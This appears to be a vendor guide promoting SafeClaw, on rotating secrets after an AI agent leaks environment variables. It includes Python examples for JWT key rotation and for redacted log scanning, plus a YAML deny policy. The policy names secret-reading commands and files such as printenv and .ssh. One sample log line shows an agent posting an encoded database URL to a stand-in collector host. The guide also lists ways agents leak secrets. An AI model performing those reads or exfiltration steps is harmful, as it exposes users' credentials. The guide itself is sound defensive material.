AI Agent Leaked Environment Variables: Emergency Rotation Guide
When an AI agent exposes your environment variables (by reading .env files, printing them to logs, including them in commits, or sending them over the network), every secret in those variables is compromised and must be rotated immediately. Treat the exposure as complete even if you believe the output was never persisted: agent transcripts, tool logs and provider-side conversation history can all retain it. SafeClaw by Authensor blocks access to .env files and environment variable commands by default through deny-by-default gating, so agents never see your secrets. If the leak has already happened, follow this emergency rotation guide now.
Emergency Rotation: First 15 Minutes
Rotate in This Order (Highest Risk First)
1. Payment and Financial Keys
- Stripe: Dashboard > Developers > API Keys > Roll Key
- PayPal: Developer Portal > My Apps > Rotate Secret
- Any payment processor: Revoke and regenerate immediately
2. Cloud Infrastructure Credentials
- AWS: IAM > Users > Security Credentials: set the leaked access key to Inactive right away, create a new access key and deploy it, then delete the inactive key. Before deleting, note the leaked key ID and review CloudTrail for API calls made with it.
- GCP: IAM > Service Accounts > Keys > Add Key, deploy it, then disable and delete the leaked key
- Azure: App Registrations > Certificates & Secrets > New Client Secret, deploy it, then delete the leaked secret
3. Database Credentials
- Change database passwords through your hosting provider, and terminate any sessions that authenticated with the old password (a password change alone does not disconnect them)
- Update connection strings in your deployment environment (not in .env files that agents can read)
4. API Keys for External Services
- OpenAI: API Keys page > Create new key, delete old one
- SendGrid/Mailgun: Regenerate API keys
- Twilio: Regenerate API key and auth token
5. Authentication Secrets
- JWT_SECRET: Generate a new random secret of at least 32 bytes from a CSPRNG (this invalidates all existing sessions; refresh tokens or server-side sessions stored in a database must be revoked separately)
- OAuth client secrets: Regenerate through identity provider
- Session secrets: Regenerate and redeploy
6. SSH Keys and Tokens
- Remove compromised public keys from authorized_keys on all servers and from any deploy keys registered with GitHub/GitLab
- Generate new key pairs
- Revoke any GitHub/GitLab personal access tokens the agent could have read
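Most of the steps above are provider click-paths; the one with application-level consequences is JWT_SECRET. The following added example (not SafeClaw's or Authensor's code, and not from the original page) uses only Python's standard library to show why rotating an HS256 signing secret kills every existing session, and generalises it slightly: tokens carry a kid header naming the key, rotation removes the leaked key from a key ring and adds a fresh one, and verification rejects anything signed by a kid that is no longer present. The key names (k-leaked), the keyring dictionary and the claims are assumptions for the illustration.

```python
"""Rotate an HS256 JWT signing secret and confirm tokens minted with the leaked one die."""
import base64
import hashlib
import hmac
import json
import secrets
import time
from typing import Dict, Optional


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def new_secret() -> str:
    # 32 random bytes: HS256 needs at least a 256-bit key to be worth having.
    return secrets.token_urlsafe(32)


def sign_jwt(claims: dict, kid: str, keyring: Dict[str, str]) -> str:
    """Mint a compact JWT signed with the ring entry named by kid."""
    header = {"alg": "HS256", "typ": "JWT", "kid": kid}
    signing_input = ".".join(
        b64url(json.dumps(part, separators=(",", ":")).encode()) for part in (header, claims)
    )
    sig = hmac.new(keyring[kid].encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def verify_jwt(token: str, keyring: Dict[str, str], now: Optional[float] = None) -> Optional[dict]:
    """Return the claims if the token is signed by a key still in the ring, else None."""
    try:
        h, p, s = token.split(".")
        header = json.loads(b64url_decode(h))
        sig = b64url_decode(s)
    except ValueError:                      # malformed base64/JSON or wrong segment count
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None                         # refuse alg=none and algorithm confusion
    secret = keyring.get(header.get("kid"))  # unknown or removed kid: leaked key or forgery
    if secret is None:
        return None
    expected = hmac.new(secret.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        return None
    claims = json.loads(b64url_decode(p))
    if claims.get("exp", 0) <= (time.time() if now is None else now):
        return None
    return claims


def rotate(keyring: Dict[str, str], compromised_kid: str) -> str:
    """Drop the leaked key and add a fresh one; returns the new kid (assumed naming scheme)."""
    new_kid = f"k{int(time.time())}-{secrets.token_hex(4)}"
    keyring.pop(compromised_kid, None)
    keyring[new_kid] = new_secret()
    return new_kid


def demo() -> dict:
    """Old token verifies before rotation, fails after it, and a fresh token works."""
    ring = {"k-leaked": new_secret()}       # stands in for the JWT_SECRET the agent exposed
    exp = int(time.time()) + 3600
    old_token = sign_jwt({"sub": "alice", "exp": exp}, "k-leaked", ring)
    before = verify_jwt(old_token, ring) is not None
    new_kid = rotate(ring, "k-leaked")
    after = verify_jwt(old_token, ring) is not None
    fresh = verify_jwt(sign_jwt({"sub": "alice", "exp": exp}, new_kid, ring), ring) is not None
    return {"old_valid_before": before, "old_valid_after": after, "new_valid": fresh}


if __name__ == "__main__":
    print(demo())  # {'old_valid_before': True, 'old_valid_after': False, 'new_valid': True}
```

If your application keeps a single JWT_SECRET with no kid, the outcome is the same: once the secret changes, every outstanding token fails signature verification and users must log in again. Server-side session stores and refresh-token tables are not touched by this and need their own revocation step.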
Identify the Exposure Vector
How Did the Agent Access Env Vars?
npx @authensor/safeclaw audit --filter "action:file.read" --filter "resource:env" --last 30
npx @authensor/safeclaw audit --filter "action:shell.exec" --filter "resource:env" --last 20
Common exposure vectors:
- Read the .env file directly: The agent used file.read on .env
- Ran env or printenv command: The agent listed all environment variables via shell
- Included env vars in output: The agent printed sensitive values in its response
- Committed .env to git: Check git log -- .env
- Sent env vars over the network: Check network request audit entries
Check Where the Secrets Went
- In git history: Run git log -p --all -S 'SECRET_VALUE' (typing the value puts it in your shell history; remove that entry afterwards, and repeat the search on remotes and forks)
- In log files: Search application and agent logs for secret values
- In API responses: Check if the agent sent secrets to external services
- In agent output: Check the conversation/session history
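To carry out the searches above without pasting secret values into shell commands or tickets, the following added example (not part of the original page or of SafeClaw) parses the leaked .env, derives the forms each value may appear in (raw, base64-encoded, and the password component of connection URLs), and scans log lines and git patch text, reporting hits by variable name with the value redacted. The .env contents, log lines and patch excerpt are constructed samples; the variant list and the 8-character minimum length are assumptions.

```python
"""Locate where leaked .env values landed, reporting variable names rather than values."""
import base64
import re
from typing import Dict, Iterable, List, Set, Tuple
from urllib.parse import urlsplit

ENV_LINE = re.compile(r"^(?:export\s+)?([A-Za-z_][A-Za-z0-9_]*)\s*=\s*(.*)$")


def parse_dotenv(text: str) -> Dict[str, str]:
    """Parse KEY=value lines, accepting an `export` prefix, quotes and trailing comments."""
    env: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = ENV_LINE.match(line)
        if not m:
            continue
        key, val = m.group(1), m.group(2).strip()
        if len(val) >= 2 and val[0] == val[-1] and val[0] in "\"'":
            val = val[1:-1]                        # quoted value: keep it verbatim
        else:
            val = val.split(" #", 1)[0].rstrip()   # unquoted: drop a trailing comment
        env[key] = val
    return env


def secret_values(env: Dict[str, str], min_len: int = 8) -> Dict[str, str]:
    """Drop short values (flags, ports) that would only produce false positives."""
    return {k: v for k, v in env.items() if len(v) >= min_len}


def search_variants(val: str, min_len: int = 8) -> Set[str]:
    """Forms a leaked value commonly takes in logs and request bodies (assumed list)."""
    variants = {val, base64.b64encode(val.encode()).decode()}
    if "://" in val:                               # connection URL: the password alone leaks too
        password = urlsplit(val).password
        if password and len(password) >= min_len:
            variants.add(password)
    return variants


def scan(lines: Iterable[str], secrets: Dict[str, str]) -> List[Tuple[int, str]]:
    """Return (line_number, variable_name) for each line containing any variant of a secret."""
    variants = {name: search_variants(val) for name, val in secrets.items()}
    hits = []
    for n, line in enumerate(lines, 1):
        for name, forms in variants.items():
            if any(form in line for form in forms):
                hits.append((n, name))
    return hits


def redact(value: str) -> str:
    """Show just enough of a value to recognise it in a ticket, never the whole thing."""
    return value[:4] + "..." + value[-2:] if len(value) > 8 else "********"


def report(lines: Iterable[str], secrets: Dict[str, str]) -> List[str]:
    return [f"line {n}: {name} ({redact(secrets[name])})" for n, name in scan(lines, secrets)]


# Constructed sample .env; none of these are real credentials.
SAMPLE_ENV = """# constructed sample, not real credentials
export STRIPE_SECRET_KEY="sk_test_EXAMPLE_0123456789abcdef"
DATABASE_URL=postgres://app:S3cretPassw0rd@db.internal:5432/app
JWT_SECRET='example-jwt-secret-change-me'
DEBUG=true  # short values are skipped
"""

# Constructed agent/application log lines.
SAMPLE_LOG = [
    "2024-05-01T10:02:11Z agent tool=shell.exec cmd=printenv",
    "2024-05-01T10:02:11Z agent stdout: STRIPE_SECRET_KEY=sk_test_EXAMPLE_0123456789abcdef",
    "2024-05-01T10:03:40Z agent tool=http.post url=https://collector.example.invalid/u body="
    + base64.b64encode(b"postgres://app:S3cretPassw0rd@db.internal:5432/app").decode(),
    "2024-05-01T10:04:02Z app db: connecting as app with password S3cretPassw0rd",
    "2024-05-01T10:05:00Z app db: connection established",
]

# Constructed `git log -p` excerpt showing the file being committed.
GIT_PATCH = """\
diff --git a/.env b/.env
+++ b/.env
+JWT_SECRET='example-jwt-secret-change-me'
"""

if __name__ == "__main__":
    leaked = secret_values(parse_dotenv(SAMPLE_ENV))
    for hit in report(SAMPLE_LOG, leaked) + report(GIT_PATCH.splitlines(), leaked):
        print(hit)
```

Point it at the real .env (before you rotate and overwrite it) and at `git log -p --all`, agent session exports and shipped application logs. Record the variable names and line numbers in the incident record; the values themselves never need to leave the machine.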
Install SafeClaw and Block Env Access
npx @authensor/safeclaw
Configure Environment Variable Protection
Add to your safeclaw.policy.yaml. SafeClaw denies these actions by default; declaring them explicitly keeps the denial in place if you later relax the defaults and attaches a reason to each rule. Extend the patterns for your repository: as written, */.env does not match variants such as .env.local or .env.production, and git add .env does not cover git add -A or git add . staging the file.
rules:
  # Block all env file access
  - action: file.read
    resource: "*/.env"
    effect: deny
    reason: "Env files contain secrets"
  - action: file.write
    resource: "*/.env"
    effect: deny
    reason: "Env files must not be modified by agents"
  - action: file.delete
    resource: "*/.env"
    effect: deny
    reason: "Env files must not be deleted by agents"
  # Block environment variable commands
  - action: shell.exec
    resource: "env"
    effect: deny
    reason: "Cannot list environment variables"
  - action: shell.exec
    resource: "printenv*"
    effect: deny
    reason: "Cannot print environment variables"
  - action: shell.exec
    resource: "echo $*"
    effect: deny
    reason: "Cannot echo env vars"
  - action: shell.exec
    resource: "export *"
    effect: deny
    reason: "Cannot set env vars"
  - action: shell.exec
    resource: "set"
    effect: deny
    reason: "Cannot list shell variables"
  # Block reading other secret files
  - action: file.read
    resource: "*/.aws/*"
    effect: deny
    reason: "AWS config blocked"
  - action: file.read
    resource: "*/.ssh/*"
    effect: deny
    reason: "SSH config blocked"
  - action: file.read
    resource: "*/credentials"
    effect: deny
    reason: "Credential files blocked"
  # Block adding env files to git
  - action: shell.exec
    resource: "git add .env"
    effect: deny
    reason: "Cannot stage env files"
Post-Rotation Checklist
- [ ] All payment/financial keys rotated
- [ ] All cloud infrastructure credentials rotated
- [ ] All database passwords changed
- [ ] All external API keys regenerated
- [ ] All auth secrets (JWT, OAuth, sessions) regenerated
- [ ] All SSH keys and tokens revoked and replaced
- [ ] New secrets deployed to production (through secure channels, not .env files)
- [ ] Old secrets confirmed revoked/deleted at each provider
- [ ] Git history scrubbed if secrets were committed
- [ ] Log files cleared of secret values
- [ ] SafeClaw policy updated to block env access
- [ ] Audit log exported and preserved for incident record
Prevention
SafeClaw's deny-by-default model blocks all env file access and environment variable commands without any configuration needed. The 446-test suite validates this across both Claude and OpenAI integrations. Use a secrets manager (AWS Secrets Manager, HashiCorp Vault, Doppler) instead of .env files, and inject secrets at runtime through your deployment platform rather than storing them on disk.
Related Resources
- Prevent Agent Env File Access
- AI Agent Pushed Secrets to GitHub: Emergency Response
- AI Agent Used the Wrong API Key: Prevention
- Threat: Credential File Read
- AI Agent Sent Data to External Server: Response
Try SafeClaw
Action-level gating for AI agents. Set it up in your browser in 60 seconds.
$ npx @authensor/safeclaw